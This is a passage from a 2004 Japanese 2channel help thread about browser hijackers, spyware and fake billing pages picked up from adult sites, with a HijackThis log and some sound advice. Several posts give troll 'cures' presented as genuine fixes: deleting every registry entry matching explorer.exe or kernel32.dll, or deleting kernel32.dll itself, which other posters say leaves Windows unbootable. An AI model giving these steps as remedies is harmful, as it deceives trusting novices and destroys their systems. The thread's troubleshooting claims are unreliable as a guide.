O4 - HKLM\..\RunServices: [SAgent2ExePath] C:\Program Files\Common Files\EPSON\EBAPI\SAgent2.exe O4 - HKLM\..\RunServices: [McAfeeWebScanX] C:\PROGRAM FILES\NETWORK ASSOCIATES\MCAFEE VIRUSSCAN\WebScanX.Exe /RUNSERVICES O4 - HKLM\..\RunServices: [SchedulingAgent] mstask.exe O4 - HKLM\..\RunServices: [Vshwin32EXE] C:\PROGRAM FILES\NETWORK ASSOCIATES\MCAFEE VIRUSSCAN\VSHWIN32.EXE O4 - HKCU\..\Run: [Taskbar Display Controls] RunDLL deskcp16.dll,QUICKRES_RUNDLLENTRY O4 - Startup: VAIO Action Setup.lnk O4 - Startup: EPSONプリンタウインドウ!3 環境設定(2).lnk = C:\WINDOWS\SYSTEM\E_SRCV02.EXE O4 - Startup: Encoder Agent.lnk = C:\Program Files\Windows Media Components\Encoder\WMENCAGT.EXE O8 - Extra context menu item: Iriaでダウンロード - D:\PROGRAM FILES\IRIA107A\iria_ie1.htm O8 - Extra context menu item: DCさくらでダウンロード(&D) - D:\Program Files\saku1731\DC-Sakura\Download.htm O8 - Extra context menu item: DCさくらで画像をダウンロード(&M) - D:\Program Files\saku1731\DC-Sakura\ImageAnalizer.htm O8 - Extra context menu item: DCさくらで選択範囲をダウンロード(&N) - D:\Program Files\saku1731\DC-Sakura\SelectedTextAnalizer.htm O8 - Extra context menu item: DCさくらでリンク一覧をゲット(&K) - D:\Program Files\saku1731\DC-Sakura\LinkAnalizer.htm O8 - Extra context menu item: DCさくらで全てのURLをゲット(&G) - D:\Program Files\saku1731\DC-Sakura\TagAnalizer.htm O8 - Extra context menu item: Iriaですぐにダウンロード - D:\PROGRAM FILES\IRIA107A\iria_ie5.htm O8 - Extra context menu item: ReGet Deluxe で全てをダウンロード(&L) - C:\PROGRAM FILES\COMMON FILES\REGET SHARED\CC_All.htm O8 - Extra context menu item: Re&Get Deluxe でダウンロード - C:\PROGRAM FILES\COMMON FILES\REGET SHARED\CC_Link.htm
117 :
続き :04/11/20 09:54:47 ID:qnmUOPT/
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\SYSTEM\Shdocvw.dll
O9 - Extra button: ReGet - {38AAF320-C5B4-11D1-B75E-111111111111} - D:\PROGRAM FILES\REGET\REGET\ReGet.exe (HKCU)
O9 - Extra 'Tools' menuitem: &Re&Get - {38AAF320-C5B4-11D1-B75E-111111111111} - D:\PROGRAM FILES\REGET\REGET\ReGet.exe (HKCU)
O12 - Plugin for .ivr: C:\PROGRA~1\INTERN~1\PLUGINS\NPRVRT32.dll
O12 - Plugin for .avi: C:\PROGRAM FILES\NETSCAPE\COMMUNICATOR\PROGRAM\PLUGINS\npavi32.dll
O16 - DPF: {90231C0E-765E-4429-8F70-F4E9A0F8D44A} (WebCtrl Class) -
http://www.peeringportal.net/WebPlayerCab/Fandango/1107/FandangoV.cab O16 - DPF: ppctlcab -
http://ppupdates.ca.com/downloads/scanner/ppctlcab.cab O18 - Filter: text/html - {EA1E5E40-3A25-11D9-9D06-000A20FE9EE4} - C:\WINDOWS\SYSTEM\IEH.DLL
O18 - Filter: text/plain - {EA1E5E40-3A25-11D9-9D06-000A20FE9EE4} - C:\WINDOWS\SYSTEM\IEH.DLL
118 :
112 :04/11/20 09:55:32 ID:qnmUOPT/
これで全部です。ここからどうすれば・・・
122 :
黒猫 ◆l/IRP0btKM :04/11/20 10:37:54 ID:SwrdIAg5
>>112 RCDで再インストールせよ。直る。大事なのは保存しておけ。すべて消える。
半角文字列に来い。むやみにエロを見るな。
123 :
ひよこ名無しさん :04/11/20 11:32:50 ID:QRbIDXhi
>>112 ダウンロードが好きなんでつね
MXにIriaにReGetですか
だからウィルスもダウンしたんだろきっと
127 :
ひよこ名無しさん :04/11/20 15:17:24 ID:ArAXh8X0
よく行くエロサイトの動画はReal One Playerで見てたのですが 最近Windows Media Playerでしか見れなくなりました。 今まではクリックすると自然にRealに飛んでいたのですが 今ではWindowsに行ってしまいます。 どなたか、私の健やかな性生活のためにも Real One Playerで見る方法を教えてください。
すれ違い、Real Oneで再生を関連付けろやハゲ
129 :
105 :04/11/20 15:57:26 ID:VXwzV1Qq
>>106-111 の皆様、ご助言ありがとうございます。
数日中にお教えいただいた情報をためしたいと考えております。
そこでまた疑問がありましたら質問させていただきます。
ありがとうござました。
130 :
ひよこ名無しさん :04/11/20 17:19:19 ID:L45rJOeA
セーフモードを解除するにはどうすればよいのでしょうか?
132 :
ひよこ名無しさん :04/11/20 17:33:31 ID:L45rJOeA
再起動してみてもなおらないんです。しかもインターネットにも接続できなくて、携帯からアクセスしてます。セーフモードに入る時に、ファイル名を指定して実行というのに何か入力してセーフモードを立ち上げたのですが、それを教えてもらえませんか?
134 :
ひよこ名無しさん :04/11/20 17:41:38 ID:L45rJOeA
ありがとうございます。不具合が起こったらまた報告致します。
135 :
ひよこ名無しさん :04/11/20 17:42:45 ID:eheujneR
>>5 のHijackThisのログ診断をしたんですが
「Unnecessarily」と書かれているものはFixしてもいいんですか?
137 :
ひよこ名無しさん :04/11/20 18:02:04 ID:yEQrIvFK
>>132 ありがとうございました。あとは各種インストールを
するだけという所まできました。この書き込みもパソから
行ってます。
たまに「何故そこまで無知なんだお前は」と思うことがある
ここ見てると、エロサイトで沈没するβακα..._〆(゚▽゚*)多いね。 ほんとにエロは最強だよ。 エロで破滅する香具師、( ゚,_ゝ゚)バカジャネーノ?
破滅するほどエロで居たい・・・
そんなにいいか?
雑談すんな
ごめんなさい・・・。
はい!次の質問!!
145 :
ひよこ名無しさん :04/11/20 21:23:50 ID:Bo7XHBef
すみませんが、ご教示願います。 とあるサイト(海外)にアクセスしたら、exeファイルを仕込まれました(ノートン反応あり)。 以降、強制終了→exe削除(プログラムファイルには無かったのでデスクトップのみ) →ウィルススキャン(検出されず)→スパイウェアスキャン(検出されず)、とまではやったのですが、 以降、起動ごとにデスクトップ上にでかでかと ‘Warning! YOU'RE IN DANGER!‘で始まる警告文(以降総て英文) が表示されるようになりました(常に表示。ソフトでは無いので消せません) また、文章全体がリンクになっていて、アドレスが、 ://213.159.117.149/partner/jump.php?2 となっていて、またIEの初期画面も ://213.159.117.134/partner/index.php に書き換えられていました。 言葉足らずですみませんが、状況と対策を教えて下さい。
書いてる?
149 :
145 :04/11/20 22:19:22 ID:Bo7XHBef
>>146 テンプレ読め、と言われても何処を読めばいいのか・・・。
リンク含めたすべてを熟読すれば、そりゃ解決するでしょうが、
それがいつになるのか・・・。
せめてどの部分を、くらいは教えて頂けないでしょうか?
は〜い、次の質問!
(゚∀゚)アヒャヒャヒャヒャ
テンプレなど糞 あまり役に立っていない
テンプレって「気休め程度」ってとこだな 手動でレジストリ操作するのが一番
>>155 初心者って自分で宣言する馬鹿にそれが出来るか?
質問者が来て ここのテンプレをその通りに実行してもあまり意味がない。 テンプレやって解決した人はゼロだよ。
言い切ったな、馬鹿。
確かに居ないな
解決しなくてもいいからテンプレやれ。
まあ、テンプレやろうが、やるまいが、困ってる人が来たらたっぷり弄んでやるってのがこのスレの趣旨だからな
>>157 テンプレやって解決した人は書き込まないんじゃねーの?
経験は大切なことだが、スパイウェアによる症状をなおす知識など これっぽっちも必要じゃないんだよ。 や ら れ た ら お わ り なおすことを考えるよりも、リカバリして最初に対策をしておけば それ以後罠に掛かるようなヘマは絶対にしなくなる。 物事はすべて勉強だ。リカバリして失敗の経験を無駄にするな。
165 :
ひよこ名無しさん :04/11/21 02:30:02 ID:GskLdtKl
テンプレやったら解決できました!テンプレさん、ありがとうございました!!
166 :
ひよこ名無しさん :04/11/21 04:34:25 ID:Vl959wIf
『システムの復元』をやると、復元ポイント以降に入手した動画や写真も消えてしまうんですか?
168 :
:04/11/21 04:46:47 ID:???
¥初心者です。 ¥テンプレやっても解決できないので、レジストリを適当に弄って見ました。 ¥パソコンが起動できなくなってしまいました! いつかこのようなレスが付きそうだ
以前、テンプレやったら更にひどくなってリカバリせざるを得ませんでした。
おまいら暇ですね。
リカバリして2週間でまたリカバリだよ。
ここのスレのテンプレを素直に実行すると そういうことになる。
age
WindowsMEを使っている初心者です。 スレ違いかと思いますがPCがおかしくなったので、オンラインスキャンをしてみたら VBS_REDLOF.Aというウィルスが見つかりました。 ネットを徘徊していたのが原因のようです。 アンチウィルスソフトは入っていないので手動で駆除するしか無いようですが、 どうやって駆除したらいいのか分かりません。
お前みたいに馬鹿な奴はセキュリティソフト買って駆除するのが一番早いと思うよ
>>177 REDLOFかよ(((゚Д゚)))ガクガクブルブル
c:\windows\wscript.exeを削除後PC再起動でREDLOFが消えますよ。
>>178 カネがねえから聞いてんだよヴォケ
早く何とかしろ
181 :
177 :04/11/21 16:32:15 ID:???
即レスありがとうございます
>>178 ソースネクストでもいいですか?
>>179 ありがとう、今からやってみます。
しっかしどうしてこう全くセキュリティがない状態でネットに接続してる奴が多いんだ? 戦争で何も装備していかないのと同じじゃねーかよ
だよなあ。アンチウィルスもファイアーウォールも入れてない、WindowsUpdateもやっていない。 そういうやつらがネット上にゴロゴロいるなんて信じられないよね。 俺は核シェルターから繋いでいるから安全だ。
俺はWin95の時代はネットに繋いでいなかったしOSもアプリも大した容量じゃなかったから 不具合が出るたびにリカバリしてたけど、今はリカバリとアプリのインストールだけで かなりの時間がかかるし各種設定も面倒。だからセキュリティをしっかりしてウィルスや 悪質なスパイウェアにだけはかからないようにして極力リカバリしないで済むようにしている。 あの頃は大抵のことはリカバリで何とかなるから好きなようにPCを弄って遊んだけど、 ネット接続が当たり前な今のPCだと初心者はそういう感覚では使えないかな? ネットに接続してるとネットの接続設定やらメールの設定やら、他にもここのスレ的には セキュリティソフトの導入やWindowsUpdateまで、初心者だとかなり難しそうだからなー。 でもリカバリを知らない奴も多いしなー。
カネがない ヒマがない やる気もない めんどくさい
PC初心者は自分では何にもできない。出来なくて当たり前。
だから他人の力を借りる。自分はただ見ているだけ。
そんな初心者にはテンプレ
>>2 の1と2をこまめに実行させて
regeditの使用を体で覚えさすのが一番
Winの解説書、つーか雑誌みたいなの1冊でも持ってれば 判るのに・・・と思うことも多い。
パソコンのトラブル解消法/windows98/ME専用 スタートをクリック ↓ ファイルを指名して実行をクリック ↓ regeditと入力してOKをクリック ↓ レジストリエディタが開く ↓ 編集をクリックして検索をクリック ↓ kernel32.dllと入力して検索をクリック ↓ 検索して見つかったものを片っ端から削除 ↓ 検索が終わったらパソコンを再起動 ↓ 問題解決 ↓ (゚∀゚)ウマー
ノーガードで2年以上パソコンやってリカバリしたのは2回だけだったけど 今度は2週間しかもたなかった。ついてねえ。
msconfigのスタートアップに[ara-key]がいっぱいありました。 待て! はて?おれはny一度もやった覚えは無いのだが。 ただ1つだけ思い当たる節がある。 バックドアにやられてしまい、今もそのままだから勝手に入ってきたのかな。
XPで188の方法試したらどうなるの??
起動しなくなる
193 :
ひよこ名無しさん :04/11/21 21:14:20 ID:cVta1vdd
次スレのテンプレにこれも付け足そうぜ! パソコンのトラブル解消法/その1 スタートをクリック ↓ ファイルを指名して実行をクリック ↓ regeditと入力してOKをクリック ↓ レジストリエディタが開く ↓ 編集をクリックして検索をクリック ↓ explorer.exeと入力して検索をクリック ↓ 検索して見つかったものを片っ端から削除 ↓ 検索が終わったらパソコンを再起動 ↓ 問題解決 ↓ (゚∀゚)ウマー
194 :
ひよこ名無しさん :04/11/21 21:15:41 ID:cVta1vdd
パソコンのトラブル解消法/その2 スタートをクリック ↓ ファイルを指名して実行をクリック ↓ regeditと入力してOKをクリック ↓ レジストリエディタが開く ↓ 編集をクリックして検索をクリック ↓ kernel32.dllと入力して検索をクリック ↓ 検索して見つかったものを片っ端から削除 ↓ 検索が終わったらパソコンを再起動 ↓ 問題解決 ↓ (゚∀゚)ウマー
195 :
ひよこ名無しさん :04/11/21 21:20:43 ID:cVta1vdd
俺は、
>>193-194 の方法をやって「助けて」を解決できた。
またこの方法は未知のウィルス、スパイウェアにも効果あり。
欠点はウィルス・スパイウェアによりレジストリエディタがメモ帳な何か
別のファイルで上書きされてしまったら、この方法は実行できないということ。
これでセキュリティOFFにしても怖くない!
('A`)y- ツマンネ age厨乙・・・
かつて地雷リンク貼ったヤツは悪だったが、 こんな湿気たネタ貼るヤツはなんていったら言いのだろう
冷ややかな空気を読めないやつらしいから 自分の中ではイケてるネタだと思い込んでるフシがある
パソコンのメールが使えなくなりました。outlook explorerを起動 するとなんか意味のわからないエラーがでます。ホスト’○○’が 見つかりません。サーバー名が正しいことを確認してください・・ と表示されます。どなたか解決策を教えてください。お願いします 。
スレ違いってなんですか??ほんとに初心なもので・・・。
>>203 「スレッド違い」
1 ひよこ名無しさん 04/11/17 23:00:00 ID:pjjtpLzL
エロサイトに限らずWEBを見て回ってたらブラウザ乗っ取られて大変なことに…
いったいどうしたらいいの?って人のためのスレッドです。
にゃーー。それってやばいのでは??
ほんとの初心者さんですか? メール欄には何も書かなくていいですよ。
あ、なんでもないです。ごめんなさい。まちがえました。
そ〜なんですか・・。ほんとに初心です。2ちゃんねるのこと 友達に聞いてやってみました。どーもでした!
ワシが若い頃には、そのBBSの流れ・雰囲気を理解するために 1ヶ月はROMれ、と言われたもんじゃがのう・・・
ノ::::゙、 ヽヽヽヽ ゙、 ヘ:::::::::;;: -‐''''""( )1 ゙、::::::::-‐''""" ̄"'i :V;;||:::: '~ニ=ッ, r='| i!f !::::: ゙、i i!ゝ!:::: ‐/リ 1ヵ月のROMが無理じゃったら、せめて i::/:、 :::、 /''ii'V テンプレは読め、ときつく教えられた  ̄ハ:::::\ "''il|バ'' もんじゃがのう・・・
時代は変わっていく。
213 :
ひよこ名無しさん :04/11/22 00:15:54 ID:kG5u9HD5
>>212 時代が変わっても、「テンプレ嫁!」は不変の真理・・・
誰か客呼んでこいよ
超高度な客か、超お馬鹿な客キヴォンヌ
217 :
ひよこ名無しさん :04/11/22 00:48:13 ID:PZTzROb5
中島みゆき
>>217 元に戻す方法は再インストールすれば元に戻る。
俺もアンタが貼ったリンクを踏んだが何もなかったよ。
>>217 そういった情報はC\WINDOWS内の「explorer.exe」に格納されています。
それを元に戻すには、「スタート」を開いてください。
(スタートはWindowsを終了させるときに開くメニューです。通常は画面の一番左下にあります。)
スタートを開いたら次は「ファイルを指名して実行」をクリックしてください。
ファイルを指名して実行を開いたら、名前のところに「regedit」と入力してください。
(「」は抜いて入力してください。)
regeditを入力したらOKをクリックしてください。
レジストリエディタが開きましたね。ここからが本番です。
レジストリエディタが開きましたら、上の方に「編集」というのがありますよね。
それを開いたら検索をクリックして、検索する値に「explorer.exe」と入力して次を検索をクリックしてください。
(「」は抜いて行なってください。続けて検索する時はキーボードのF3というキーを押します。)
後は検索して見つかったものを片っ端から削除していくだけです。
検索が終わりましたら、PCを再起動させてみてください。
これで直るはずです。
文章下手すぎ。根は馬鹿。
アンチウイルス使うと遅くなるんだろ? そんなの使わないで動かなくなったらリカバリでいいじゃん。 2時間あれば元に戻るんだから。
>>223 リカバリディスクは自分で作るもの。NortonGhostつかえ
226 :
ひよこ名無しさん :04/11/22 10:11:54 ID:FUzEYRph
パソコン初心者板総合質問スレッドvol.872 で
誘導されてこっちにきた795ですが、
アダルトサイトを踏んだせいか、
インターネットエクスプローラーを開くと
下のアドレスになってしまいます。
ttp://213.159.117.134/index.php ツール→インターネットオプションで、HPのアドレス変えても、
上のアドレスに戻ってしまうし、
標準設定を押しても上のアドレスになります。
なんとかならないでしょうか?
おまいには無理だろうなあ
スレ内の情報さえも見ようとしないやつはいったい何なんだろう?
ただの教えて君
231 :
ひよこ名無しさん :04/11/22 10:53:31 ID:4Bo7fwVQ
233 :
231 :04/11/22 11:06:41 ID:???
>>232 そうですか、頑張ります・・
どなたか教えてくださいお願いします
235 :
231 :04/11/22 11:35:05 ID:???
237 :
236 :04/11/22 14:11:23 ID:???
Ad-awareSEを3回程スキャン、消去を繰り返して ようやく一部削除できました。 しかし、まだエクスプローラーバーに一部残骸が残っています。 取り合えず実害がないようなので様子見て見ます。
今日も静かな昼下がり・・・
240 :
ひよこ名無しさん :04/11/22 16:45:01 ID:KMFQYhTY
ad-awareで何回やっても VX2 ってのが離れてくれない・・・。 どうすれば・・・?
242 :
ひよこ名無しさん :04/11/22 16:48:43 ID:KMFQYhTY
>>240 セーフモードでad-awareを?
・・・やってみる。
コイツ確実にテンプレ読んでねえな・・・テンプレを作ってくれた人に対しての冒涜だな
>3)削除したいファイルがあるが「アクセスできません。使用中です」等といわれて 削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動 わからないとかのレヴェルじゃねえだろボケ
カスタムブロッキングがアプデート出来ないんだけど(エラーが出る) アド変わった?
247 :
ひよこ名無しさん :04/11/22 20:06:18 ID:oUur65Yu
コントロールパネルのアプリケーションの追加と削除に紛れ込んだ 海外のサイトのプログラム?(ソフト?)を削除したいです。 3つぐらい紛れ込んでるみたいで、パソコンを起動させるとそのサイトが 開きます。このことに関係あるかどうか分かりませんが、文字が勝手に 大きくなったりします。 削除したいソフトを選択(青いラインが出てくる)→「追加と削除」ボタンを押す→ 「OK」ボタンを押す、、、とやっても削除できません。 使用OSはWin98、パソコンは日立のプリウスPCT-650 他のスレッドで質問したらここへ行けと言われました。よろしくお願いします。
エロサイト見ていたらどうしたら言いのですか?
251 :
ひよこ名無しさん :04/11/22 20:38:21 ID:kG5u9HD5
[ara-key]ってなんですか? システム設定ユーティリティのスタートアップにあったのよ! ねえ!ねえ!ねえ!ねえ!ねえ!ねえ!ねえ!ねえ!ねえ!ねえ!ねえ!ねえ!ねえ!ねえ!ねえ!ねえ! 教えて下さいですわ。教えて下さらないかしら。教えて貰わないとお姉さん困っちゃいますわ。
>>252 VBScript_REDLOF.Aというウィルスです。
C:\windows\system32\kernel32.dllを削除してください。
>>252 「Antinny に、やられました。」で検索すれば?
つかny厨死ねば?
番号=252ですわ 番号=253お返事ありがとうございますわ。 やっぱりウィルスに感染してしまっていたのね。 お姉さんカンカンになっていますわ。 今から該当ファイルを削除してくるわね。
まて! kernel32.dllを消したら起動できなくなるぞ。 消すならexplorer.exe ってもう遅いか…
ネタ大いに結構。せっかくだからおにゃにょこ名のハンドルつけてくれ。 気分だけでも華やいでいいぞぅ。
恥ずかしい奴だな。
>>254 が図星のくせにスルーしてやがる。いい気味だw
あんな奴には教えなくて結構
誰か客呼んでこいよ
264 :
麗奈 :04/11/22 21:35:45 ID:???
麗奈(レナ)ですわ。 kernel32.dllを削除しようとしたのですけれども、Windowsが使用中と言われ削除できませんでしたわ。 どうやって消したら良いのでしょうか? 教えてくれないとお姉さん泣いちゃいそうですわ。
265 :
麗奈 :04/11/22 21:41:31 ID:???
まあ!あなた達!とっくに3分たちましたわよ! 3分以内に教えてくれないなんてあたしのこと、どうでもいいのね。 ウルトラマンは3分以内に怪獣を倒してウルトラ星に帰って行っちゃうのよ。 お姉さん泣きますわ。 うえ〜〜〜ん!えんえんえんえんえんえーーーーーーーーん!!
その話は置いといて 先日PCを購入したのですが、HDDから音がします。 故障ですか?
そしてかんしゃくを起こした麗奈はパソコンを窓から投げ捨てるのであった。
269 :
麗奈 :04/11/22 21:44:56 ID:???
恥ずかしがりやなのよ
コノスレトカンケイネ('A`)
271 :
麗奈 :04/11/22 21:47:03 ID:mDaP97wF
あたしは正真証明の女の子ですわ。 ウソは付きませんわ。 どうしたらいいのですか? お姉さん待っていますわ。
>>266 呪われています
Regseekerを使いなさい
273 :
ひよこ名無しさん :04/11/22 22:52:52 ID:JaNFv9r9
エロサイトみたら立ち上げるたび広告が出て困ってます!どうしたらいいんですか?
| | | | | | | | | | || | | | | | レ | | | | | J || | | | | | J | | | し || | | | レ | | レ| || J | J し | | || J | し J| J レ /V\ /◎;;;,;,,,,ヽ _ ム::::(l|l゚Д゚)| …うわぁ ヽツ.(ノ::::::::::.:::::.:..|) ヾソ:::::::::::::::::.:ノ ` ー U'"U'
277 :
ひよこ名無しさん :04/11/22 23:56:00 ID:q1NnqVtY
ケーブルアンドワイヤレスから国際電話の請求書が来たよ。 1万5千円だから払えないことはないけど納得いかない。 ADSLなのに国際電話に繋がってたってどういうこと?
281 :
ひよこ名無しさん :04/11/23 12:23:23 ID:VJQ3vR8o
About:blankがでまくってこまっています!どうしたらでなくなりますか?
285 :
ひよこ名無しさん :04/11/23 12:56:27 ID:bOcpfpLQ
288 :
ひよこ名無しさん :04/11/23 13:06:54 ID:LFniit4p
エロサイトのウイルスは、ウイルスソフトを買えば、 だいたい全部駆除できるの?
290 :
ひよこ名無しさん :04/11/23 13:30:01 ID:7eDOgM1u
全部バカを装ったネ タです
ちゃんと質問答えろよ じゃねーと存在価値ねーだろ
「WARNING」あなたのコンピューターはspywareとして知られているparasites」への「exposedでした。 Spywareは、あなたのオンライン活動に関する個人の情報をモニターし送信し、あなたのプライバシーの「aの重大な妨害です。 」Spywareは下に検知された「easily、およびリンクのダウンロードにはavaiableな無料のspywareスキャナを備えたremoved」でありえます。
298 :
ひよこ名無しさん :04/11/23 16:04:34 ID:r1kfcCdS
セーフモード(F8を連打)でアドバンスメニューってのが出ないんですが タイミングが悪いのでしょうか? 起動させてすぐにF8連打であってますか?
>>298 セーフモードでの起動はものによってまちまち。
説明書嫁。
300 :
ひよこ名無しさん :04/11/23 17:03:28 ID:r1kfcCdS
>>299 さん
win2000なんです。説明書が無いのです・・・泣
41を見ながらスパイウェアらしきものと苦闘をしています。
また、この状態でネットで他人に送信するのはヤバイでしょうか?
301 :
ひよこ名無しさん :04/11/23 17:58:49 ID:JMGFbmm7
嫁の実家PCが得ろサイトにつながるようになった! とパニックになってます。 (WinXP、IE) とりあえず修復はしましたが、IEのツールバーが英語に なっちゃったらしいですが、これは日本語に戻せんとですか?
303 :
ひよこ名無しさん :04/11/23 18:27:00 ID:r1kfcCdS
300です。 HijackThisでログを引っ張ってくる所までは出来たんですけど、たくさん あってドレ消していいのか解りません。 PC起動したら213.159.117.134/index.phpがすぐに出る症状なんですが。
(⌒ ⌒) (⌒ ⌒) ノノハヽ(プ〜♪) ノノハヽ(プ〜♪) 从*‘ー‘从 ノ ノ〜′ 从*‘ー‘从 ノ ノ〜′ (⊃⌒ *⌒⊂) (⊃⌒ *⌒⊂) /__ ノψヽ__) /__ ノψヽ__) (⌒ ⌒) (⌒ ⌒) ノノハヽ(プ〜♪) ノノハヽ(プ〜♪) 从*‘ー‘从 ノ ノ〜′ 从*‘ー‘从 ノ ノ〜′ (⊃⌒ *⌒⊂) (⊃⌒ *⌒⊂) /__ ノψヽ__) /__ ノψヽ__)
Oh!It’s Cool !
スタート→ファイル名を指定して実行→msconfig→システム構成ユーティリティ BOOT.INIのSAFEBOOTにチェック→セーフモード起動
308 :
ひよこ名無しさん :04/11/24 06:28:37 ID:MCTtfGSh
初めまして。 スタートページが書き換えられるほか、とつぜんアダルトサイトの広告が出てきます。 アドウエアでスパイウエア(84個)を削除したのですが、6個はできないと出てきました・・・ あと、何をやればよいでしょうか?
>>308 あとは下をやればPC内の「ゴミ」を一掃することができる。
スタートをクリック
↓
ファイルを指名して実行をクリック
↓
regeditと入力してOKをクリック
↓
レジストリエディタが開く
↓
編集をクリックして検索をクリック
↓
explorer.exeと入力して検索をクリック
↓
検索して見つかったものを片っ端から削除
↓
検索が終わったらパソコンを再起動
311 :
ひよこ名無しさん :04/11/24 12:46:15 ID:79YtEQs+
>>309 のやり方で、検索して見つかったものを片っ端から削除。
これをやる場合、全部消しても大丈夫なんでしょうか?
>>311 全部消さないと大丈夫じゃないですけど?
>>311 >>309 のような
初心者を陥れるような暇人のレスを見て、それを鵜呑みに
実行して泣きを見ようとしているわけだ。
元はと言えば、テンプレきちんとやらないで1から教えて的な
質問をするバカばかりなことに原因がある。
嘘を嘘と見抜くためには、テンプレとそのリンク先の
信頼のおけるサイトをよーく読むことだ。
楽をしようとする奴のそばには必ず落とし穴を用意する暇人が
現れるということだな。そんなものに引っ掛かってもだれも同情なんか
してくれないぞ?
315 :
ひよこ名無しさん :04/11/24 15:16:24 ID:79YtEQs+
311です。
>>41 などを読んだんですが、どれを消していいのかお手上げ状態なんです。
314さんの言う事は、ごもっともと思います。
>>315 何一つ自分の状況説明ができないんだな。
「お手上げ状態なんです」これだけか?
ならあきらめて、ネットすることを今後やめて下さい。
318 :
ひよこ名無しさん :04/11/24 16:08:51 ID:K5a8OzTt
spybotを使用しているのですが、CnsMinはどうすれば削除できるのですか? あと、DSO Exploitというものが削除してもすぐ復活します。どうすればいいのですか。
325 :
320 :04/11/24 16:55:33 ID:???
┌─┐ |も.| |う | │来│ │ね│ │え .| │よ .| バカ ゴルァ │ !!.│ └─┤ プンプン ヽ(`Д´)ノ ヽ(`Д´)ノ (`Д´)ノ ( `Д) | ̄ ̄ ̄|─| ̄ ̄ ̄|─| ̄ ̄ ̄|─□( ヽ┐U 〜 〜  ̄◎ ̄ . ̄◎ ̄  ̄◎ ̄ ◎−>┘◎
326 :
ひよこ名無しさん :04/11/24 17:02:44 ID:SbPCONmZ
すいません、いまインターネットオプションみたらダイヤルアップ接続のところに妙な数字の羅列が 追加されていました、、、当方ADSLでルーターを介しLAN接続でインターネットをしています。 これはやばいですかーー?
327 :
315 :04/11/24 17:20:56 ID:79YtEQs+
テンプレなど読みました。そして実行もしました。 それでも削除しても良いモノとの判別がつきません。 聞くの最後にしますので、これだけ聞きたいです。 アプリケーションの削除でShock Waveとwindows2000HotFix(Ple-Spl) SeeQ253589for more infometion。 この二つは消しても平気でしょうか?
>>327 消さなくていい。つーか単語でググれば危ないかどうかぐらいすぐにわかるだろ。
329 :
318 :04/11/24 18:19:32 ID:K5a8OzTt
>>319 いや、テンプレのサイト404だったから・・・
330 :
ひよこ名無しさん :04/11/24 18:22:59 ID:v+hzoHQQ
ダイアルアップの音が普段と違い普通の電話に繋がってしまいました どうしたらよろしいでしょうか
>>330 俺の誘導レスを見て来たのか?ID違ってるけど。
333 :
ひよこ名無しさん :04/11/24 18:26:51 ID:v+hzoHQQ
>>331 すっみません気を悪くなさらないでください
334 :
ひよこ名無しさん :04/11/24 18:28:08 ID:v+hzoHQQ
(´ι _` ) なにがそうですだよ
>>334 さっきエロサイト見てからおかしくなったって
言ってた?
337 :
ひよこ名無しさん :04/11/24 18:31:28 ID:JwOy13OS
>> 336はいそうです。よろしくおねがいします。
ID:JwOy13OSはどうでもルール無視でいきたいらしい
ほっとけよ キリねえし
340 :
ひよこ名無しさん :04/11/24 18:34:36 ID:JwOy13OS
=337 いまようやく質問のしかたにきずきました すみませんでしたやりなおします。
>> 336 =337 ナメとんのか
うむ。
344 :
ひよこ名無しさん :04/11/24 19:27:50 ID:+tpeyGbc
>>342 なめてません。さっきからいろいろロムているのです。
それにIDをだすなんか書いてあってもど素人にはどうしたらいいのかわからないのです
ダイヤルチエカーというのも下のタスクに青い虫メガネみたいなもの
があるからONと思うのですが、いろいろチェックの最中です。
345 :
ひよこ名無しさん :04/11/24 19:30:08 ID:+tpeyGbc
=344もうリカバリーかけることに気持ちが向いてます。
下げろボケ
=345 じゃあリカバリすれば
ここはPC初心者にはきびしいスレだな
助けてください!! 今エロサイト見てたら、画像クリックしただけで ご登録ありがとうがございます。みたいなのが出て、 リモートホスト、IPアドレスが表示されて料金支払えって… 払わなきゃダメなの…?
>>345 リカバリーかけなきゃならない程の物じゃないって。
インターネットオプション見れるか?
>349
あせる気持ちはわかるが、質問する前に、テンプレートに目を通すべきだ。
>>6 へ進む。
352 :
349 :04/11/24 23:08:48 ID:???
テンプレに目を通してきました。 で、払わなきゃダメなの…?
>>6 はもう過去ログに回ったな。
結論。払わなくていいんだよ。タダのハッタリ。
>>352 サイトへもう一度行ってそこに書いてあるメールアドレスに
「退会させて頂きます。」って送るだけでだいじょうぶだよ。
>>352 そんなもん払ったらそれこそカモにされるぞ。詐欺は放置でおk。
359 :
ひよこ名無しさん :04/11/24 23:31:46 ID:+4Y5sYOr
>>145 の方と全く同じ症状です。スパイポッドを
試してみましたが治りませんでした。
どうやって治したらいいのでしょう・・。
初心者の私には手におえません・・。
詳しい方教えてください。お願いします。
360 :
ひよこ名無しさん :04/11/24 23:34:31 ID:VPXty1n7
ポッドなどない
364 :
359 :04/11/24 23:41:52 ID:???
テンプレも読む気ないし、リカバリもする気ない。
367 :
ひよこ名無しさん :04/11/24 23:44:19 ID:VPXty1n7
金太郎飴でもしゃぶってろ
368 :
359 :04/11/25 00:05:09 ID:uFtcBjsl
>>363 それです!
今、試したら画面は元に戻りました。
ありがとうございました。しかしまだホームが
書き換えられてしいます。どうしたら治りますか?
まだ本当に初心者なので、ごめんなさい。
とにかく碌にテンプレ等を読まないで質問する香具師は放置しろよ
>>368 他力本願のひとつは叶ったようですね。もう少しです。
もっと教えてオーラを全面に出すのです。
回答者は名前を「テンプレ読め!」に変えれば?
そりゃわかるが、でもパッと見症状が判るようなら とりあえず答えてやりてえ。 だけどテンプレ嫁!
テンプレを読む奴はそのまま直ってる場合が多いのでレスはつかない。 つまりここに書き込む奴はテンプレを読んでいない、とほぼ断定しても良いと思う。
>>375 つーことはFAQスレみたく、解決方法について列記してときどきヽ(`Д´)ノればいいのか?
ここはエロ河童をおちょくるスレッドです
382 :
ひよこ名無しさん :04/11/25 00:25:00 ID:343fOS5n
ダークロリータ踏んだら起動も出来なくなりました。テンプレの方法ができません。業者呼ぶしかない?
